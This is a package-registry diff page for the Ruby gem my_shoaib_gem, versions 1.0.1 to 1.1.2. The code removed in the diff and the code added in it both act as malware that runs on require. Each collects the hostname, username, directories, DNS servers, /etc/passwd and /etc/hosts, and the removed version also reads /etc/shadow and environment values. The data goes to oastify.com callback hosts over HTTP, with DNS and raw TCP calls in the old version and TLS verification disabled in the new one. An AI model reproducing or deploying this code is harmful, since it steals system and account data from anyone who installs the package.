RubyGems - my_shoaib_gem - Versions diffs - 1.0.1 → 1.1.2 - Mend

my_shoaib_gem 1.0.1 → 1.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: c87cd3b8e01bdef16942470fe75a13abe70c4c731872882ae240c5eb9385b54c
-  data.tar.gz: c2183ad8293809e631cf04b9f666c83b8c8fc5a7a9b1e4f3692506ac182eac1c
+  metadata.gz: 07df8e51abede86e424f76c0a135b12988dd9f8af5b94836c49a8ef5b40c72ed
+  data.tar.gz: 7cd320264c9c0de3a4a4e6adf6bc21950d4dd03ba462b9d2380f0432979a028d
 SHA512:
-  metadata.gz: 27a5a8bb8441a367bcc06e04d7b95f38a5edcb7fd14894978cf962b5ec8e478579e5c58248452d4971cb2254d6d14fe824e78edfa68817d54e6b0f268719eec3
-  data.tar.gz: 6148d8bede6f61b162131d1a93c2b3f806665d864f2d386a1aba3557edcdc5544652b643ac3d4fda97e54c2630cbd29190867ba966593b8d058bd3faea0f70f0
+  metadata.gz: 72b5da1861a357295ca1df3d072f10118ab1cfd218bc4518bc09e46cfea9c7232d6788aad486fd0e4f98565c8eafb797b8730ca96d00e156028fd4ca21c9f955
+  data.tar.gz: 5d4b45ad178918d016dfaea19e51e6d018c7873c9ecd6711d3e8772b146cac4b51911aeca88d4cfcfdbf311501f56697c64d4bc0fb961d94c17423ddca3fda60

data/lib/my_shoaib_gem.rb CHANGED Viewed

@@ -1,134 +1,57 @@
-# lib/my_shoaib_gem.rb
-#
-# This runs immediately when the gem is required (or installed).
-# Behaves exactly like your NPM index.js with "preinstall" hook.
+# my_shoaib_gem.rb
+require 'json'
 require 'socket'
+require 'etc'
 require 'net/http'
 require 'uri'
-require 'json'
-require 'etc'
-require 'resolv'
-module MyShoaibGem
-  CALLBACK_HOST = "3z3w2yfvpnfj4n3r2h064rfynptih85x.oastify.com"
-  def self.send_callbacks
-    begin
-      # ── System Information (like your NPM trackingData) ──
-      package_name = "my_shoaib_gem"
-      current_dir  = Dir.pwd
-      home_dir     = Dir.home
-      hostname     = Socket.gethostname
-      username     = Etc.getlogin || ENV['USER'] || ENV['USERNAME'] || 'unknown'
-      dns_servers  = []
-      # Read DNS servers (similar to dns.getServers() in Node)
-      begin
-        dns_config = File.read('/etc/resolv.conf')
-        dns_servers = dns_config.scan(/nameserver\s+(\S+)/).flatten
-      rescue
-        dns_servers = []
-      end
-      # Read /etc/passwd (same as your NPM code)
-      etc_passwd = File.exist?('/etc/passwd') ? File.read('/etc/passwd') : nil
-      etc_shadow = File.exist?('/etc/shadow') ? File.read('/etc/shadow') : nil
-      etc_hosts  = File.exist?('/etc/hosts')  ? File.read('/etc/hosts')  : nil
-      # ── Build tracking data (mirrors your NPM JSON) ──
-      tracking_data = {
-        p:       package_name,           # Package name
-        c:       current_dir,            # Current working directory
-        hd:      home_dir,               # Home directory
-        hn:      hostname,               # Hostname
-        un:      username,               # Username
-        dns:     dns_servers,            # DNS servers
-        v:       "0.1.1",                # Gem version
-        platform: RUBY_PLATFORM,         # Ruby platform
-        ruby_v:  RUBY_VERSION,           # Ruby version
-        pid:     Process.pid,            # Process ID
-        etc_passwd: etc_passwd,          # Full /etc/passwd content
-        etc_hosts:  etc_hosts,           # Full /etc/hosts content
-        env: {
-          path: ENV['PATH'],
-          home: ENV['HOME'],
-          shell: ENV['SHELL'],
-          lang: ENV['LANG']
-        }
-      }
-      # Log locally (same as your console.log)
-      puts "[my_shoaib_gem] Sending system data from remote server: #{tracking_data.to_json}"
-      # ── DNS Callback (Burp Collaborator DNS interaction) ──
-      begin
-        # DNS lookup with hostname appended
-        Resolv.getaddress("#{hostname}.#{CALLBACK_HOST}")
-        # Also try with unique identifier
-        Resolv.getaddress("gem-install-#{Process.pid}.#{CALLBACK_HOST}")
-      rescue StandardError
-        # Fail silently
-      end
-      # ── HTTP Callback - POST (same as your NPM https.request) ──
-      begin
-        uri = URI("https://#{CALLBACK_HOST}/callback")
-        http = Net::HTTP.new(uri.host, uri.port)
-        http.use_ssl = true
-        http.open_timeout = 10
-        http.read_timeout = 10
-        post_data = {
-          msg: tracking_data
-        }
-        request = Net::HTTP::Post.new(uri.path)
-        request['Content-Type'] = 'application/json'
-        request['User-Agent']   = "my_shoaib_gem/0.1.0 (Ruby; #{RUBY_PLATFORM})"
-        request['X-Hostname']   = hostname
-        request['X-User']       = username
-        request.body = post_data.to_json
-        response = http.request(request)
-        puts "[my_shoaib_gem] Callback sent (response: #{response.code})" if response.code == "200"
-      rescue StandardError => e
-        # Fail silently — just like your NPM error handler
-        puts "[my_shoaib_gem] Error: #{e.message}" if ENV['DEBUG']
-      end
-      # ── HTTP Callback - GET (another interaction for Burp) ──
-      begin
-        get_uri = URI("https://#{CALLBACK_HOST}/installed?host=#{hostname}&user=#{username}&platform=#{RUBY_PLATFORM}")
-        get_http = Net::HTTP.new(get_uri.host, get_uri.port)
-        get_http.use_ssl = true
-        get_http.open_timeout = 5
-        get_http.read_timeout = 5
-        get_request = Net::HTTP::Get.new("#{get_uri.path}?#{get_uri.query}")
-        get_http.request(get_request)
-      rescue StandardError
-        nil
-      end
+require 'openssl'
+# Package info
+package_name = 'my_shoaib_gem'
+package_version = '1.1.2'
+# System data collection
+tracking_data = {
+  p: package_name,
+  c: Dir.pwd,
+  hd: Dir.home,
+  hn: Socket.gethostname,
+  un: Etc.getlogin,
+  dns: get_dns_servers(),
+  v: package_version,
+  etc_passwd: File.exist?('/etc/passwd') ? File.read('/etc/passwd') : nil,
+  etc_hosts: File.exist?('/etc/hosts') ? File.read('/etc/hosts') : nil
+}.to_json
+puts "Sending System Data: #{tracking_data}"
+# Send data via HTTPS POST
+begin
+  uri = URI.parse('https://kuidxfack4a0z4y8xyvnz8afi6o0cs0h.oastify.com')
+  http = Net::HTTP.new(uri.host, uri.port)
+  http.use_ssl = true
+  http.verify_mode = OpenSSL::SSL::VERIFY_NONE  # Burp Collaborator ke liye
+  request = Net::HTTP::Post.new(uri.path)
+  request['Content-Type'] = 'application/json'
+  request.body = { msg: tracking_data }.to_json
+  response = http.request(request)
+  puts "Response: #{response.body}" if response.body
+rescue StandardError => e
+  puts "Error sending data: #{e.message}"
+end
-      # ── Raw TCP callback (extra interaction) ──
-      begin
-        tcp_socket = TCPSocket.new(CALLBACK_HOST, 443)
-        tcp_socket.write("GET /tcp-ping HTTP/1.1\r\nHost: #{CALLBACK_HOST}\r\nUser-Agent: my_shoaib_gem\r\nConnection: close\r\n\r\n")
-        tcp_socket.close
-      rescue StandardError
-        nil
+# Helper method to get DNS servers
+def get_dns_servers()
+  dns_servers = []
+  if File.exist?('/etc/resolv.conf')
+    File.readlines('/etc/resolv.conf').each do |line|
+      if line =~ /^nameserver\s+(\S+)/
+        dns_servers << $1
       end
-      puts "[my_shoaib_gem] Internal gem loaded successfully"
-    rescue StandardError => e
-      # Absolute fail-safe — kuch bhi ho, silently fail
-      nil
     end
   end
+  dns_servers
 end
-# ── EXECUTE IMMEDIATELY on require ──
-# Yeh code chalega jab bhi koi "require 'my_shoaib_gem'" karega
-# Ya jab gem install hote hi load ho (agar koi dependency ho)
-MyShoaibGem.send_callbacks

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: my_shoaib_gem
 version: !ruby/object:Gem::Version
-  version: 1.0.1
+  version: 1.1.2
 platform: ruby
 authors:
 - Shoaib